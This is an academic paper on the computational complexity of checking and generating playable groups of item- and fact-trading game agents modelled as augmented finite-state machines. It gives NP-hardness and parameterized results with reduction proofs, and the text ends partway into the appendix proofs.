Abstract—Automatic generation of game content is an important challenge in computer game design. Such generation requires methods that are both efficient and guaranteed to produce playable content. While existing methods are adequate for currently available types of games, games based on more complex entities and structures may require new methods. In this paper, we use computational complexity analysis to explore algorithmic options for efficiently evaluating the playability of, and generating playable groups of, enhanced agents that are capable of exchanging items and facts with each other and human players. Our results show that neither of these problems can be solved both efficiently and correctly, either in general or relative to a surprisingly large number of restrictions on enhanced agent structure and gameplay. We also give the first restrictions under which the playability evaluation problem is solvable both efficiently and correctly.

I. INTRODUCTION

Given the time and cost involved with the human design of computer games, the ability to automatically generate game content is an important problem in computer game design [1], [2]. It is critical that such automatic methods generate playable content because “[g]iven the way most commercial games are designed, any risk of the player being presented with unplayable content is unacceptable” [1, p. 183]. They should also operate quickly, particularly if content is being generated in real time to accommodate unanticipated player actions or choices (a situation in which human-based methods such as testing or manually adjusting game parameters to ensure playability are not applicable).
Though existing automatic methods appear to be adequate for currently available types of games, e.g., [3], this may not be so for more complex games. A case in point is games incorporating enhanced agents that maintain collections of items and facts which can be both exchanged with and used in defining behavior with respect to other agents and human players. Such agents nicely model socially realistic agent-player interactions that take place over long (possibly disjoint) periods of time, cf., the short-term action-based interactions modelled by finite-state agents [4]–[6]. Initial work on generating groups of enhanced agents [7] has demonstrated that genetic algorithms and backtracking-based agent-group playability evaluation suffice for the off-line and real-time generation of moderate- (∼ 50) and small- (∼ 5) size groups of playable agents, respectively. However, in the interests of improved scalability, it would be most useful to know if more efficient methods are available for generating larger and more complex groups of agents, and, if so, in what circumstances. In this paper, we present initial results addressing both of these questions. First, using techniques from computational complexity theory [8], we show that evaluating the playability of a given group of enhanced agents (in particular, determining if a human player can interact with the group to obtain a specified goal-set of items and facts) is \( NP \)-hard and thus intractable in general. This holds even in the case where there is only one given agent and no time limit on achieving the goal, as well as whether or not the agents operate autonomously or under the control of a game narrative manager. Second, using techniques from parameterized complexity theory [9], we establish that surprisingly few restrictions on enhanced agents and human-agent interactions render playability evaluation tractable. 
Though these results are derived for the model of game agents and playability given in [7], we show that they apply not only to evaluating the playability of a much broader class of models but also to the playable agent-group generation process itself. The remainder of this paper is organized as follows. In Section II, we present an augmented finite-state machine model of game agents that can exchange items and facts with other agents and human players, and formalize playability evaluation for such agents. Section III demonstrates the intractability of this problem. Section IV describes a methodology for identifying conditions for tractability, which is then applied in Section V to identify such conditions for agent playability evaluation. To keep the main text focused on the implications of our results for computer game design, all proofs of results are given in Appendix C. Finally, our conclusions and directions for future work are given in Section VI.

A. Related Work

Determining whether given game levels can be completed and are thus playable is known to be \( NP \)-hard (and not efficiently solvable in general) for many types of games [10]–[14]. However, this work has not been extended to address the problem of designing playable levels, let alone evaluating the playability of or designing playable groups of agents. There is existing work on the computational complexity of verifying whether given multi-agent systems can perform a specified task (and hence are in a sense “playable”) as well as designing multi-agent systems to correctly perform specified tasks [15]–[18]. The formalizations of agent control and interaction mechanisms and the environments analyzed in this work are very general and powerful (e.g., arbitrary Turing machines or Boolean propositional formulae), rendering the intractability of these problems unsurprising.
Moreover, as these formalizations obscure almost all details of the agent mechanisms and environment, the derived results are also unenlightening with respect to possible restrictions that could yield tractability. Similar reasoning applies with respect to existing complexity analyses of verification problems relative to single robots and swarms of robots (see [19, Section 4.2.1] and references).

II. FORMALIZING AGENT PLAYABILITY EVALUATION

In this section, we extend the popular finite-state model of game agents [4] to accommodate item- and fact-enhanced agents and use this extended model to state the agent-group playability evaluation problem. To aid readability, the technical details of this extended model and its operation in gameplay are given in Appendix A. At a minimum, an agent capable of exchanging items and facts with another agent (which could be a human player) should be able to do the following:

- Maintain an internal state as well as collections of personal items and facts;
- Perform actions (and possibly change internal state) in response to another agent’s actions and offered items and facts;
- As part of a performed action, give in return some of its own personal items and facts to that other agent.

Following [7], there can be at most one copy of an item in a game at any time (i.e., an item can be possessed by at most one agent or human player), but there can be any number of copies of a fact (i.e., any number of agents or human players can possess the same fact). Agents with the requisite abilities described above can be modeled using augmented finite-state machines (AFSM) (see Figure 1). An AFSM is a straightforward extension of the commonly-used finite-state model of game agents.
Each transition between two states in an AFSM \( M \) corresponds to an interaction between \( M \) and another agent in which that other agent performs action \( a \) with item- and fact-sets \( I \) and \( F \) offered to \( M \), and \( M \) responds in turn via action \( a' \) with (1) a change from state \( q \) to state \( q' \) and (2) item- and fact-sets \( I' \) and \( F' \) being given to the other agent. Any unspecified proposed action and offered item- and fact-sets relative to a state \( q \) whose result is not explicitly stated as a transition is assumed to loop back on \( q \) with no effect, e.g., \( M \) ignores the offered amulet and mumbles under its breath. For simplicity, we focus on deterministic AFSM in which for any given \( q, a, I, \) and \( F \) there is at most one transition.

Examples of three possible AFSM representing two shopkeepers \( S1 \) and \( S2 \) and a wizard \( W \) are shown in Figure 1. These AFSM are defined relative to the action-, item-, and fact-sets \{chat, consult, intimidate, offer\}, \{false amulet (Af), true amulet (At), gold piece (G), sword (Sw)\}, and \{know shopkeeper #1 (kS1), know shopkeeper #2 (kS2), know wizard (kW)\}, respectively. Each transition in which item- and fact-sets \( I \) and \( F \) are offered as a result of action \( a \) and \( I' \) and \( F' \) are given in response as part of action \( a' \) is written as an arrow between \( q \) and \( q' \) with the label “\( a \{I\}\{F\}/\{I'\}\{F'\} \)”, i.e., \( a' \) is ignored. For example, \( S1 \) has a transition between \( q0 \) and \( q2 \) such that \( S1 \) hands over the fake amulet when intimidated by another agent with a sword.

Playability of a group of AFSMs can be formalized in terms of hard (inviolable) and soft (violable) constraints [7].
Example hard and soft constraints are, respectively, that a specified goal must be achieved and that the interactions in any goal-achieving interaction-sequence should incorporate as many of the actions allowable to agents as possible. Evaluations of playability are based on the degree to which these constraints can be satisfied by a human player interacting with the given agents. For simplicity, we focus on minimum playability, i.e., whether or not a human player can interact with a given set of agents to obtain specified goal-sets of facts and items. The above yields the following formalization:

AFSM Agent Playability Evaluation (APE)

Input: A set $A = \{a_1, \ldots, a_n\}$ of AFSM with associated initial item- and fact-sets $\{I^0_{a_1}, \ldots, I^0_{a_n}\}$ and $\{F^0_{a_1}, \ldots, F^0_{a_n}\}$, initial player item- and fact-sets $I^0$ and $F^0$, goal item- and fact-sets $I_G$ and $F_G$, and a positive integer $t$.

Question: Can the player obtain $I_G$ and $F_G$ by engaging in at most $t$ interactions with the agents in $A$?

Note that this formalization applies regardless of whether the agents in $A$ operate autonomously or under the direction of a game narrative manager; hence, results derived relative to this formalization will apply in both of these cases.

III. Agent Playability Evaluation is Intractable

In this section, we address whether or not agent playability evaluation can be done efficiently relative to the model described in Section II. Following general practice in Computer Science [8], we define efficient solvability as being solvable in the worst case in time polynomially bounded in the input size. We show that a problem is not polynomial-time solvable, i.e., not in the class $P$ of polynomial-time solvable problems, by proving it to be at least as difficult as the hardest problems in problem-class $NP$ (see [8] and Appendix B for details).

Result A: APE is $NP$-hard.
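As a concrete (worst-case exponential) illustration of the APE question, the minimum-playability check can be phrased as a breadth-first search over joint configurations of agent states and player holdings, exploring at most $t$ interactions. The dict-based AFSM encoding below is our own simplification, not the paper's formal model; items move between owners while facts are copied and never lost:

```python
from collections import deque

def playable(agents, starts, p_items, p_facts, goal_items, goal_facts, t):
    # agents[i] maps (state, action, offered_items, offered_facts)
    #           -> (next_state, given_items, given_facts)
    # Unlisted (state, action, offer) combinations loop back with no effect,
    # so they never change the configuration and can be skipped.
    start = (tuple(starts), frozenset(p_items), frozenset(p_facts))
    queue = deque([(start, 0)])
    seen = {start}
    while queue:
        (states, items, facts), depth = queue.popleft()
        if goal_items <= items and goal_facts <= facts:
            return True
        if depth == t:
            continue
        for i, agent in enumerate(agents):
            for (q, act, off_i, off_f), (q2, give_i, give_f) in agent.items():
                if q != states[i] or not (off_i <= items and off_f <= facts):
                    continue
                new_items = (items - off_i) | give_i   # items change hands
                new_facts = facts | give_f             # facts are copied
                new_states = states[:i] + (q2,) + states[i + 1:]
                nxt = (new_states, new_items, new_facts)
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, depth + 1))
    return False
```

The search space is bounded by the product of the agents' state counts and the subsets of items and facts, which is consistent with both the hardness of the general problem and the fixed-parameter result for small $|A|$, $|I|$, and $t$ discussed later in the paper.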
Modulo the conjecture $P \neq NP$, which is widely believed to be true [20], the above shows that APE is not polynomial-time solvable. Note that this result holds even in the very restricted case in which the player only interacts with a single agent, i.e., $|A| = 1$, and an unlimited number of interactions between the player and that agent is allowed, i.e., $t = \infty$.

IV. A Method for Identifying Tractability Conditions

A computational problem that is intractable for unrestricted inputs may yet be tractable for non-trivial restrictions on the input. This insight is based on the observation that some $NP$-hard problems can be solved by algorithms whose running time is polynomial in the overall input size and non-polynomial only in some aspects of the input called parameters. In other words, the main part of the input contributes to the overall complexity in a “good” way, whereas only the parameters contribute to the overall complexity in a “bad” way. In such cases, the problem is said to be fixed-parameter tractable for that respective set of parameters. The following definition states this idea more formally.

Definition 1: Let $\Pi$ be a problem with parameters $k_1, k_2, \ldots$. Then $\Pi$ is said to be fixed-parameter (fp-) tractable for parameter-set $K = \{k_1, k_2, \ldots\}$ if there exists at least one algorithm that solves $\Pi$ for any input of size $n$ in time $f(k_1, k_2, \ldots)n^c$, where $f(\cdot)$ is an arbitrary function and $c$ is a constant. If no such algorithm exists, then $\Pi$ is said to be fixed-parameter (fp-) intractable for parameter-set $K$.

In other words, a problem $\Pi$ is fp-tractable for a parameter-set $K$ if all superpolynomial-time complexity inherent in solving $\Pi$ can be confined to the parameters in $K$. In this sense the “unbounded” nature of the parameters in $K$ can be seen as a reason for the intractability of the unconstrained version of $\Pi$.
There are many techniques for designing fp-tractable algorithms [9], [21], and fp-intractability is established in a manner analogous to classical polynomial-time intractability, by proving that a parameterized problem is at least as difficult as the hardest problems in one of the problem-classes in the $W$-hierarchy $\{W[1], W[2], \ldots\}$ (see [9] and Appendix B for details). Additional results are typically implied by any given result courtesy of the following lemmas:

Lemma 1: [22, Lemma 2.1.30] If problem $\Pi$ is fp-tractable relative to parameter-set $K$, then $\Pi$ is fp-tractable for any parameter-set $K'$ such that $K \subseteq K'$.

Lemma 2: [22, Lemma 2.1.31] If problem $\Pi$ is fp-intractable relative to parameter-set $K$, then $\Pi$ is fp-intractable for any parameter-set $K'$ such that $K' \subset K$.

Observe that it follows from the definition of fp-tractability that if an intractable problem $\Pi$ is fp-tractable for parameter-set $K$, then $\Pi$ can be efficiently solved even for large inputs, provided only that the values of all parameters in $K$ are relatively small. This strategy has been successfully applied to a wide variety of intractable problems (see [9], [23] and references). In the next section we investigate how the same strategy may be used to render the problem APE tractable.

V. What Makes Agent Playability Evaluation Tractable?

The AFSM agent playability evaluation problem has a number of parameters whose restriction could render agent playability evaluation tractable. An overview of the parameters that we considered in our fp-tractability analysis is given in Table I. These parameters can be divided into three groups:

1) Restrictions on the game agents;
2) Restrictions on the human player; and
3) Restrictions on the game itself.
In the remainder of this section, we will assess the fp-tractability of APE relative to all parameters in Table I (Section V-A), show how these results apply in more general settings (Section V-B) as well as to playable AFSM agent generation (Section V-C), and discuss the implications of these results for computer game design (Section V-D).

A. Results

Our parameterized intractability results are summarized in Table I. Each column describes an intractability result that holds relative to the set of all parameters whose entries in that column are not dashes (“–”); if the result holds when a non-dashed parameter has constant value \(c\), this is indicated by an entry for that parameter with the value \(c\). Result B is notable because, when combined with the results implied by Lemma 2, it establishes the intractability of APE relative to all subsets of the considered parameters that do not include \(|A|\); the intractability of many (but not all) of the remaining subsets including \(|A|\) is then established by Results C–F. At present, we have a lone tractability result:

Result G: APE is fp-tractable for \(\{|A|, |I|, t\}\).

Results B, D, F, and G, combined with those implied by Lemmas 1 and 2, establish the intractability of APE relative to all subsets of \(\{|A|, i_A, f_A, |I|, t, i_G, f_G\}\). This in turn establishes that the parameter-set in Result G is minimal in the sense that no parameter in that set can be deleted to yield fp-tractability.

B. Generality of Agent Playability Evaluation Results

Our intractability results, though defined relative to an admittedly simple model of game agents and human-agent interaction, have a remarkable generality.
Observe that this model is a special case of many more realistic models, e.g.,

- deterministic AFSM are special cases of both nondeterministic and probabilistic AFSM (AFSM without nondeterminism, or in which all actions have probability of execution 1.0 if their triggering conditions are satisfied, are deterministic);
- player-activated AFSM are special cases of autonomous AFSM (restrict non-player-triggered interaction); and
- basic AFSM are special cases of AFSM with extra abilities (restrict use of these extra abilities).

Intractability results for these more realistic models then follow from the well-known observation in computational complexity theory that intractability results for a problem \(\Pi\) also hold for any problem \(\Pi'\) that has \(\Pi\) as a special case (suppose \(\Pi\) is intractable; if \(\Pi'\) were tractable, then any algorithm for \(\Pi'\) could be used to solve \(\Pi\) efficiently, which contradicts the intractability of \(\Pi\) – hence, \(\Pi'\) must also be intractable).

Our fp-tractability result is more fragile, as innocuous changes to agent or game models may in fact violate assumptions critical to the operation of the algorithm underlying this result. For now, we can say that, as our fp-tractability result depends on the combinatorics of possible player-agent interactions and requires only that any such interaction can be checked for validity and performed in time polynomial in the sizes of the entities involved in that interaction, our tractability result holds for all choices of agent and game model whose player-agent interactions are polynomial-time verifiable.

C. Applicability to Playable Agent Generation

The results given so far for APE are useful in suggesting improvements to the playability-evaluation module in systems like that described in Watson et al. [7]. However, our ultimate goal is still the efficient generation of playable agents, regardless of whether or not an explicit playability-evaluation module is used.
In this section, we will sketch how our results for APE apply to this larger problem. Though a full formalization of the AFSM agent-group generation problem is beyond the scope of this paper, we can informally sketch what such a problem might look like. It is trivial to construct an agent-group $A$ that will allow a player to obtain specified goal item- and fact-sets within $t$ steps (let $A$ consist of a single AFSM whose lone transition gives the player all required items and facts in response to an arbitrary action on the part of the player). Hence, a specification of the characteristics of the desired agent-group must be given: let us call such a specification $S_A$. At a minimum, $S_A$ should specify two types of characteristics:

1) Overall characteristics of agent-group and individual-agent structure; and
2) Required internal structures of individual agents.

The first type of characteristic corresponds to the AGENTS parameters in Table I, while the second could consist of specifications of required states and transitions along the lines of the system described in Watson et al. [7]. The above yields the following:

**AFSM Playable Agent Generation (PAG)**

**Input:** Item- and fact-sets $I$ and $F$, an AFSM-group specification $S_A$, initial player item- and fact-sets $I_p^0$ and $F_p^0$, goal item- and fact-sets $I_G$ and $F_G$, and a positive integer $t$.

**Output:** An AFSM-group $A$ consistent with $S_A$ such that the player can obtain $I_G$ and $F_G$ by engaging in at most $t$ interactions with the agents in $A$, if such an $A$ exists, and the special symbol $\bot$ otherwise.

This informal version can be fully formalized relative to a particular format in which specifications are written. Consider the set of specification-formats in which one can create, in time polynomial in $|A|$, a specification that can only be satisfied by a given AFSM-set $A$; let us call this set $S$.
To see how the intractability results given in Sections III, V-A, and V-B apply to PAG, note that any algorithm $a$ for a version of PAG formalized relative to any member of $S$ can be used to answer any instance of APE: given an instance $I$ of APE with agent-set $A$, construct a specification $S_A$ that generates $A$; return “No” for $I$ if $a$, run on the resulting PAG instance, returns $\bot$, and “Yes” otherwise. Hence, any intractability result (including all intractability results in Sections III, V-A, and V-B) that forbids the existence of a certain type of algorithm for APE also forbids that type of algorithm for any version of PAG formalized relative to any member of $S$. Our lone tractability result for APE does not appear to apply in such a general manner to PAG; however, it may hold relative to specific members of $S$.

**D. Discussion**

We have found that evaluating agent playability is $NP$-hard (Result A). This $NP$-hardness holds for a basic agent model and a minimal playability condition, namely that a human player can attain a specified goal by interacting with the given group of agents, even when that group consists of a single agent; moreover, as pointed out in Section V-C, this also applies to plausible schemes for generating playable agents. Our results immediately imply that it is unlikely that deterministic polynomial-time methods exist for these problems.

The scope of these results is actually broader still. It is widely believed that $P = BPP$ [24, Section 5.2], where $BPP$ is considered the most inclusive class of problems that can be efficiently solved using probabilistic methods (in particular, methods whose probability of correctness can be efficiently boosted to be arbitrarily close to probability one). Hence, our results also imply that unless $P = NP$, there are no probabilistic polynomial-time methods which correctly evaluate or generate playable agent-groups with high probability for all inputs.
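The shape of the reduction argument above can be sketched schematically (all names here are hypothetical; this only illustrates how a PAG solver would be wrapped to decide APE, with `None` standing in for the bottom symbol):

```python
def ape_via_pag(pag_solver, spec_for, ape_instance):
    """Decide an APE instance using any PAG solver.

    spec_for builds (in time polynomial in |A|, by the assumption on
    the specification-format set S) a specification satisfied only by
    the given agent-set; the instance is playable exactly when the
    solver returns an agent-group rather than None (i.e., bottom)."""
    spec = spec_for(ape_instance["agents"])
    return pag_solver(spec, ape_instance) is not None
```

Since the wrapper adds only polynomial work, an efficient PAG solver would yield an efficient APE solver, which is what the intractability results rule out.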
This then constitutes the first proof that no currently-used method (including the automated search and simulated-play-based processes described in [1], [2] or evolutionary algorithms such as that employed in [7]) can guarantee both efficient and correct operation for all inputs to these problems. As described in Section IV, efficient correctness-guaranteed methods may yet exist relative to plausible restrictions on the input and output. To our knowledge, no such restrictions have been proposed in the literature for either agent playability evaluation or playable agent generation. It seems reasonable to conjecture that some restrictions relative to the parameters listed in Table I should render these problems tractable. However, no single one of these restrictions, nor indeed many possible combinations of them, can yield tractability, even when the parameters involved are restricted to very small constants (Results B–F and Section V-C). The one exception that we have found to date (and only for agent playability evaluation) is that of simultaneously restricting $|A|$, $|I|$, and $t$ (Result G). Though this may initially seem of limited interest in that it overly restricts the form of games whose playability can be checked efficiently, it actually suggests several reasonable ways in which games can be decomposed into sub-games whose playability can be checked efficiently. For example, a long game could be decomposed into several shorter ones (restrict $t$). Alternatively, the game could be structured such that only a very small number of agents or player-agent interactions are necessary and/or relevant to achieving the goal (restrict $|A|$ and/or $|I|$); this could be done while preserving a larger game environment by embedding the goal-relevant set of agents and interactions within a goal-irrelevant set, e.g., only a few shopkeepers, wizards, or travellers are worth talking to, and only about specific matters.
A valid objection to this lone tractability result is that the running time of the underlying algorithm is impractical. This is often true of the initial algorithms derived relative to a parameter-set. However, our result is important nonetheless because it establishes fixed-parameter tractability relative to a set of parameters which (by reasoning like that above) can be of small value in practice. Once this has been done, surprisingly effective parameterized algorithms can frequently be developed with both greatly diminished non-polynomial terms and polynomial terms that are quadratic and even linear in the input size (see [9], [21] and references). A final very important proviso is in order – namely, as illuminating as the results given here are in demonstrating basic forms of (in)tractability for the agent playability evaluation and playable agent generation problems, these results do not necessarily imply that methods currently being applied to evaluate or generate agents are impractical. Differing agent models, the particular situations in which these methods are being applied, and accepted standards by which method practicality is assessed may render the results given here irrelevant. For example, current methods may already be implicitly exploiting restrictions on the input and output such that both efficient and correct operation (or operation that is correct with probability very close to one) are guaranteed. That being said, not knowing the precise conditions under which such practicality holds could have very damaging consequences, e.g., drastically slowed gameplay and/or unplayable game content, for systems (in particular, real-time-adaptable systems) using such methods that stray outside these conditions. 
Given that (as noted earlier in Section I) playability and its efficient evaluation and enforcement are very important properties of game systems, the acquisition of such knowledge via a combination of rigorous empirical and theoretical analyses should be a priority. With respect to theoretical analyses, it is our hope that the techniques and results in this paper comprise a useful first step.

VI. CONCLUSIONS

We have presented a formal characterization of the problem of game agent playability evaluation relative to an augmented finite-state machine model of game agents. Our complexity analyses reveal that, while this problem is computationally intractable in general, there are conditions that render it tractable. Knowledge of this and other such conditions can be exploited in computer game design to create efficient playability-guaranteed content generation methods with respect to more complex and interesting gameplay involving player interactions with more socially realistic game agents. In future research, we plan to explore the computational consequences of additional types of restrictions on agent playability evaluation and playable agent design relative to both the agent-model described in this paper and more complex agent-models (e.g., agents that are truly autonomous rather than player-activated) as well as minimal and broader conceptions of playability. We will also build on previous work establishing the \( \text{NP} \)-hardness of evaluating the playability of and generating playable game levels by applying parameterized analysis to establish under which restrictions these problems can and cannot be solved efficiently.
Finally, given work positing connections between human cognition and fixed-parameter tractability [19], [25], we will investigate the extent to which results such as those we have derived here can help in creating games whose level of difficulty not only is more appropriate to human players but can also be efficiently customized to the abilities of those players [2].

ACKNOWLEDGMENTS

The authors would like to thank Rod Byrne, Andrew Vardy, and Wolfgang Banzhaf for encouraging them to embark on this research and two anonymous reviewers for comments that improved the presentation of this paper. TW was supported by NSERC Discovery Grant RGPIN 228104-2010 and SW was supported by NSERC Discovery Grant RGPIN 283304-2012 to Wolfgang Banzhaf and a doctoral award from the Dean of the School of Graduate Studies at MUN.

REFERENCES

APPENDIX A

interactions of the AFSM in Figure 1 with a human player are shown in Figure 2. With respect to the goal consisting of having the true amulet and knowing the wizard, the first and second interaction-sequences achieve this goal within 5 and 8 interactions, respectively, while the third interaction-sequence does not achieve the goal and moreover cannot be extended by any sequence of interactions to achieve the goal.

APPENDIX B
PROVING INTRACTABILITY

Given some criterion of tractability like polynomial-time or fixed-parameter solvability, we can define the class $T$ of all computational problems that are tractable relative to that criterion. For example, $T$ could be the class $P$ of decision problems (see below) solvable in polynomial time, or $FPT$, the class of parameterized problems that are fp-tractable. We can show that a particular problem is not in $T$ (and thus that this problem is intractable) by showing that this problem is at least as hard as the hardest problem in some class $C$ that properly includes (or is strongly conjectured to properly include) $T$.
For example, $C$ could be $NP$, the class of decision problems whose candidate solutions can be verified in polynomial time, or a class of parameterized problems in the $W$-hierarchy $\{W[1], W[2], \ldots, W[P], \ldots, XP\}$ (see [8] and [9], respectively, for details). We will focus here on reducibilities between pairs of decision problems, i.e., problems whose outputs are either “Yes” or “No”. The two types of reductions used in this paper are as follows.

Definition 2: Given a pair $\Pi$, $\Pi'$ of decision problems, $\Pi$ polynomial-time many-one reduces to $\Pi'$ if there is a polynomial-time computable function $f$ mapping instances $I$ of $\Pi$ to instances $f(I)$ of $\Pi'$ such that the answer to $I$ is “Yes” if and only if the answer to $f(I)$ is “Yes”.

Definition 3: Given a pair $\Pi$, $\Pi'$ of parameterized decision problems with parameters $p$ and $p'$, respectively, $\Pi$ fp-reduces to $\Pi'$ if there is a function $f$ mapping instances $I = (x, p)$ of $\Pi$ to instances $I' = (x', p')$ of $\Pi'$ such that (i) $f$ is computable in $g(p)|x|^\alpha$ time for some function $g()$ and constant $\alpha$, (ii) $p' = h(p)$ for some function $h()$, and (iii) the answer to $I$ is “Yes” if and only if the answer to $I' = f(I)$ is “Yes”.

A reducibility is appropriate for a tractability class $T$ if, whenever $\Pi$ reduces to $\Pi'$ and $\Pi' \in T$, then $\Pi \in T$. We say that a problem $\Pi$ is $C$-hard for a class $C$ if every problem in $C$ reduces to $\Pi$. A $C$-hard problem is essentially as hard as the hardest problem in $C$. Reducibilities become particularly useful given the following easily-provable properties:

1) If $\Pi$ reduces to $\Pi'$ and $\Pi$ is $C$-hard then $\Pi'$ is $C$-hard.
2) If $\Pi$ is $C$-hard and $T \subsetneq C$ then $\Pi \not\in T$, i.e., $\Pi$ is not tractable.
3) If $\Pi$ is $C$-hard and $T \subseteq C$ then $\Pi \not\in T$ unless $T = C$, i.e., $\Pi$ is not tractable unless $T = C$.
The first and third properties are used below to show intractability relative to $T$-classes \( P \) and \( FPT \) and \( C \)-classes \( NP \), \( W[1] \), and \( XP \). Note that these intractability results hold relative to the conjectures \( P \neq NP \) and \( FPT \neq W[1] \) which, though not proved, are commonly accepted as true within the Computer Science community (see [8], [9], [20] for details).

**APPENDIX C**
**PROOFS OF RESULTS**

All of our intractability results will be derived using reductions from the following \( NP \)-hard decision problems:

**NONDETERMINISTIC TURING MACHINE COMPUTATION (NTMC)**
*Input*: A single-tape, single-head nondeterministic Turing machine \( M = \langle \Sigma, Q, \Delta, s, F \rangle \) (where \( \Sigma \) is an alphabet, \( Q \) is a set of internal states, \( \Delta \subseteq Q \times \Sigma \times Q \) is a set of transitions, \( s \in Q \) is the start state, and \( F \subseteq Q \) is the set of final states), a word \( x \in \Sigma^* \), and a positive integer \( k \).
*Question*: Is there a computation of \( M \) on \( x \) starting in \( s \) that reaches some final state \( f \in F \) in at most \( k \) steps?

**DOMINATING SET [8, Problem GT2]**
*Input*: An undirected graph \( G = (V, E) \) and an integer \( k \).
*Question*: Does \( G \) contain a dominating set of size \( \leq k \), i.e., is there a subset \( V' \subseteq V \) with \( |V'| \leq k \) such that for each \( v \in V \), either \( v \in V' \) or there is a \( v' \in V' \) such that \((v, v') \in E\)?

**CLIQUE [8, Problem GT19]**
*Input*: An undirected graph \( G = (V, E) \) and an integer \( k \).
*Question*: Does \( G \) contain a clique of size \( \geq k \), i.e., is there a subset \( V' \subseteq V \) with \( |V'| \geq k \) such that for all \( v, v' \in V' \), \((v, v') \in E\)?

and time/tape-square-position/tape-square-contents (TTT) facts \( t/i/s \), \( 1 \leq i \leq k \) and \( s \in \Sigma \).
Each write transition \((q, x, q')\) in \( M \) is encoded by \( k \times k \times |\Sigma| \) agents, each consisting of states \( q_0 \) and \( q_1 \) with a single transition that is enabled by the time-fact \( t \), time/head-position fact \( t/i \), time/state fact \( t/q \), and TTT fact \( t/i/s \) and returns the corresponding facts \( (t+1) \), \( (t+1)/i \), \( (t+1)/q' \), and \( (t+1)/i/s' \) for \( 0 \leq t < k \), \( 1 \leq i \leq k \), and \( s' \in \Sigma \). Analogous sets of agents are constructed for all left-move and right-move transitions in \( M \). The following four sets of two-state single-transition agents are also required:

1. A set of agents that individually enable on time-fact \( t \) and TTT fact \( (t-1)/i/s \) and return the TTT fact \( t/i/s \) for \( 1 \leq t, i \leq k \) and \( s \in \Sigma \) (i.e., bring forward in time all tape-square contents not updated by a write-transition at time \( (t-1) \));
2. A set of agents that individually enable on time/state fact \( t/f \) and return time/state fact \( (t+1)/f \) for \( 1 \leq t < k \) and \( f \in F \) (i.e., bring forward in time any final state reached at or before time \( t \));
3. A set of agents that individually enable on time-fact \( k \) and TTT fact \( k/i/s \) and return TTT fact \( k/i/s'' \) for some \( s'' \notin \Sigma \) (i.e., erase the contents of the tape at time \( k \)); and
4. A set of agents that enable on time-fact \( k \), time/state fact \( k/f \), and TTT facts \( k/1/s'', k/2/s'', \ldots, k/k/s'' \) and return completion-fact \( c \) for \( f \in F \).

Each agent starts with no items and the facts it returns, and the player starts with no items and the facts corresponding to an initial state \( q_0 \), head position 1, and \( x \) on the first \(|x|\) squares of the tape and \( s'' \) in the remaining \( k-|x| \) squares. Finally, set the goal to \( c \) and \( t = (k+1)k+1 \).
Note that the instance of APE described above can be constructed in time that is polynomial with respect to \( k \) and the size of the given instance of NONDETERMINISTIC TURING MACHINE COMPUTATION (this is necessary because \( k \) is encoded in binary in the given instance, so the value of \( k \) is exponential in the length \( \log_2 k \) of its encoding). If there is a transition-sequence of length at most \( k \) for \( M \) computing on \( x \) from \( s \) that reaches a final state, there is a sequence of exactly \( t \) agent-player interactions that will achieve the goal (as all tape-squares must be updated up to time \( k \) and be available for subsequent erasure in order to obtain goal-fact \( c \)). Conversely, if there is an interaction-sequence of length \( t \) that achieves the goal, there must be embedded in this sequence a subsequence of interactions of length \( \leq k \) that allows time/state fact \( k/f \) to be derived from time/state fact \( 0/q_0 \), time/head-position fact \( 0/1 \), and the TTT facts encoding \( x \) on the tape, which corresponds to a sequence of at most \( k \) transitions that allows \( M \) computing on \( x \) from \( s \) to reach a final state. To complete the proof, note that in the constructed instance of APE, \( i_A = 0, f_A = 3, i_I = 0, |Q| = 2, |I| = 1, i_P = 0, i_G = 0, f_G = 1, f_I = k + 2, f_P = k(k+3) + k + 1, \) and \( t = (k+1)k+1 \).

Lemma 4: DOMINATING SET polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, i_G = 0, f_G = 1, \) and \( |A| \) and \( t \) are both a function of \( k \) in the given instance of DOMINATING SET.

Proof: Given an instance \((G = (V, E), k)\) of DOMINATING SET, the constructed instance of APE consists of \( k \) identical agents plus an additional final agent.
Each of the identical agents consists of an initial state \( q_0 \) and a transition from \( q_0 \) to each of the \(|V| \) states \( q_i, 1 \leq i \leq |V| \), in which the offered item \( v_i \) is exchanged for the set of facts corresponding to all vertices in the neighbourhood of \( v_i \) (including \( v_i \) itself) in \( G \). The final agent consists of two states \( q_0 \) and \( q_1 \) and a transition from \( q_0 \) to \( q_1 \) that exchanges the complete set of vertex-facts for \( G \) for a completion-fact. Each identical agent starts with no items and the complete set of vertex-facts for \( G \), the final agent starts with no items and the completion-fact, and the player starts with the complete set of vertex-items for \( G \) and no facts. Finally, the goal is the completion-fact and \( t = k + 1 \). Note that the instance of APE described above can be constructed in time polynomial in the size of the given instance of DOMINATING SET. If there is a dominating set of size at most \( k \) in the given instance of DOMINATING SET, the player can exchange the vertices in that dominating set with at most \( k \) of the identical agents to obtain the complete set of vertex-facts for \( G \) and hence achieve the goal. Conversely, as the player can interact with each of the identical agents at most once to trade a vertex-item for its associated neighbourhood-set of vertex-facts in \( G \), any set of at most \( k + 1 \) interactions between the player and the agents that achieves the goal in the constructed instance of APE must correspond to a set of at most \( k \) vertices that form a dominating set in \( G \). To complete the proof, note that in the constructed instance of APE, \( i_A = i_I = f_G = 1, i_G = 0, \) and \( |A| = t = k + 1 \). 
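The neighbourhood-covering condition at the heart of this reduction is easy to state in code. A minimal sketch in Python (our own illustration, not part of the paper's construction):

```python
def is_dominating_set(vertices, edges, candidate):
    """True iff every vertex of G is in `candidate` or adjacent to a
    member of `candidate` (the condition the identical agents encode)."""
    closed_nbhd = {v: {v} for v in vertices}  # closed neighbourhoods N[v]
    for u, v in edges:
        closed_nbhd[u].add(v)
        closed_nbhd[v].add(u)
    covered = set()
    for c in candidate:
        covered |= closed_nbhd[c]  # facts the player gains by playing c
    return covered == set(vertices)

# Star graph: the centre alone dominates; a leaf alone does not.
star_vertices, star_edges = [1, 2, 3, 4], [(1, 2), (1, 3), (1, 4)]
assert is_dominating_set(star_vertices, star_edges, {1})
assert not is_dominating_set(star_vertices, star_edges, {2})
```

The `covered` set mirrors the vertex-facts the player accumulates by interacting with at most \( k \) identical agents in the reduction.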
Lemma 5: DOMINATING SET polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, f_I = |I| = 2, i_G = 0, f_G = 1, \) and \( |A| \) is a function of \( k \) in the given instance of DOMINATING SET.

